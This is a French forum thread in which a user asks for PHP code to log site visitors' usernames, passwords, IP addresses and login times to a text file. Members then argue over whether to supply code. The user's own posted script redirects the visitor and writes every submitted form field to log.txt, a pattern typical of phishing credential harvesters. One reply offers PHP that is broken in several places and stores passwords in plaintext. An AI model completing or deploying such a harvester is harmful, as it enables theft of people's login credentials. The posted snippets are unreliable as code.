Code php

Fermé
aspokalipse Messages postés 3 Date d'inscription lundi 30 août 2010 Statut Membre Dernière intervention 11 novembre 2010 - Modifié par aspokalipse le 9/11/2010 à 20:45
 aspokalipse - 17 nov. 2010 à 14:51
Bonjour,

Je voudrais savoir si vous connaissiez le code pour :
-Quand un utilisateur se connecte sur mon site enregistrer ses id (pseudo et mot de passe)
-Son adresse ip
-Marquer la date (le jour le mois et l'année) ainsi que l'heure

Pour envoyer ses informations dans un fichier .txt (sur le web)

Et tout sa en langage Php

Merci d'avance pour vos réponse =)



A voir également:

5 réponses

Bonsoir,
Il n'existe pas de code tout fait. Il faut le réaliser soi-même (ça s'appelle "mettre les mains dans le cambouis").
------------------------------------------------------------------------------------------------------------------------------------------------
<* Suivez-moi sur FesseS-BouC *>
0
aspokalipse Messages postés 3 Date d'inscription lundi 30 août 2010 Statut Membre Dernière intervention 11 novembre 2010
10 nov. 2010 à 22:31
Mais le truc c'est que en php je ne suis pas "pro" je ne connais pas du tout le code
0
Il n'y a pas besoin d'être pro pour écrire un tel script. Moi-même je ne suis pas un pro mais je suis capable d'écrire ce genre de script. Le PHP est un langage et comme tout langage, ça s'apprend... Si tu as du mal avec le PHP voici un endroit pour apprendre afin d'arriver à écrire toi-même tes scripts https://openclassrooms.com/fr/courses/918836-concevez-votre-site-web-avec-php-et-mysql
Bienvenue dans le webmastering :-)
-------------------------------------------------------------------------------------------------------------------------------
<* Suivez-moi sur FesseS-BouC *>
0
h3ll0

voila si sa peut t'aider :

pour avoir l'IP+Date+Heure

pour les id est passwrd au moment de la connexion tu créer des variable session :

$_SESSION['id']=$data['id'];
$_SESSION['passwrd']=$data['pass'];

$ip=$REMOTE_ADDR;
$date=date("d-m-y");
$hours=date("H:i);

$open=('./dossier/file.txt', "a+"); // ouverture du fichier
$text='ID : '.$login.'\r\n Passwrd : '.$passwrd.'\r\n IP : ; '.$ip.'\r\n date : .'$date' and
hours : '.$hours;
$fputs($open, $text); // editon dans le fichier text
$fclose($open); // fermer le fichier text

et créer un fichier text est :

touch("./Full/path/file.txt");

verification de l'existanc d'un fichier :

if(!file_exists("./User/".$_SESSION['id'].".txt)){
touch("./User/".$SESSION['id'].".text");
}else{

$open=('./User/'.$SESSION['id'].'.txt', "a+"); // ouverture du fichier
$text='ID : '.$login.'\r\n Passwrd : '.$passwrd.'\r\n IP : ; '.$ip.'\r\n date : .'$date' and
hours : '.$hours;
$fputs($open, $text); // editon dans le fichier text
$fclose($open); // fermer le fichier text

}

voila un petit exemple !

pk veut-tu mettre le login et le password dans un fichier text dangereux ?!
peut etre faciment accessible !
0
@iconqueror
Bonjour,
Ton comportement est nul !
Là tu ne lui apprend pas à pêcher pour qu'il se nourrisse par lui-même mais tu lui amènes le poisson pour qu'il ne crève pas de faim (Lao Tseu).
Ce qui fait que dès qu'il aura un problème avec TON script, il viendra de nouveau poster dans ce forum parce qu'il ne comprend RIEN à ce script ou bien qu'il aura besoin d'un autre script PHP (base de données, emailing, etc...).
Aider dans un forum comme celui-ci, c'est aider à déboguer un script qui plante ou bien aider à le modifier, donner des pistes par rapport à l'utilisation de fonctions PHP, etc...
Voilà c'est dit, rien à ajouter ;-)
-------------------------------------------------------------------------------------------------------------------------------
<* Suivre-moi sur FesseS-BouC *>
0
Lord Zero Messages postés 459 Date d'inscription lundi 18 octobre 2010 Statut Membre Dernière intervention 15 juin 2018 115
11 nov. 2010 à 10:48
Je pensais que le principe de Comment ça marche était justement de donner les réponses, pas de laisser chercher,Si il avait voulu apprendre il n'aurais pas eu besoin de toi Twinpics .En fait c'est pas la premiere fois que tu réponds de cette façon.
Quelqu'un demande de l'aide et toi tu l'envoie chercher ailleurs.
Si t'as pas la réponses inutile de te "défouler" sur la personne qui la pose.

Il n'y a pas besoin d'être pro pour écrire un tel script. Moi-même je ne suis pas un pro mais je suis capable d'écrire ce genre de script.

Pond le script et laisse courrir au lieu de l'enmener sur le site du zero.

Je te rappel juste qu'on est sur un forum pour aider les personnes et répondre a leurs questions,pas leurs faire un cours.
C'est possible qu'il ne comprenne pas le script de iconqueror et qu'il reviendra surement demander de l'aide mais ou est le probleme? c'est pas a toi qu'il en demandera car il sait deja que tu l'enverra balader sur le site du zéro.

j'essaie de comprendre ta démarche mais même en me forçant,j'arrive pas à penser lentement comme toi.
Bonne journée
0
Tu as de l'avenir dans l'humanitaire, inscrits-toi !
Ne pense pas trop vite tu va griller des neurones ;-)
Sur ce, bonne journée à toi aussi...
0
Twinpics

en venant poster ces messages se matin t'aurais cru qu'il aurait laisser un message vu l'aide que tu lui as fourni j'en suis sur que dans l'heure ou tu lui as donné ton aide il avait fini sont script !!

au moins il a une base sur quoi travailler même si il comprend pas tous aprés G00Gle est sont amis, et quand il aurat bessoin de script pour les bases de donné il demandera ou il va apprendre de lui même ! jvais pas lui faire un Topic sur tous le PHP

si té venu pour dire sa autant rien dire sérieux !!!
parce que la je m'en gogne mais carrement de ton avis

et pour mon infos ton proverbe tu la chercher toutes la nuits ou tes vraiment intelligent???

et tu croit que tu as de l'avenir dans l'humanité tu la ferait pas plutot régrécé !!!

Il n'y a pas besoin d'être pro pour écrire un tel script. Moi-même je ne suis pas un pro mais je suis capable d'écrire ce genre de script. le probleme c'est quand on débute dans un language on peut pas tous savoir un peut d'aide ne fait jamais de mal !!! tous le monde n'a pas science infuse comme toi !!
0
en faite té un bouffon toi ?!
0
aspokalipse Messages postés 3 Date d'inscription lundi 30 août 2010 Statut Membre Dernière intervention 11 novembre 2010
11 nov. 2010 à 20:23
Oula ne vous emballez pas^^

Bon ba je ne me suis pas asser expliquer j'ai un site avec un html (index.html) un fichier .php qui contient :
<?php
header ('Location: ' );
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle) ;
exit;
?>

et un fichier log.txt ou sont envoyer les données
et je voudrais savoir qui rajouter dons mon php pour obtenir l'ip et la date, heur, jour ou il s'est connecter
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
aspokalipse
17 nov. 2010 à 14:51
Up !!
0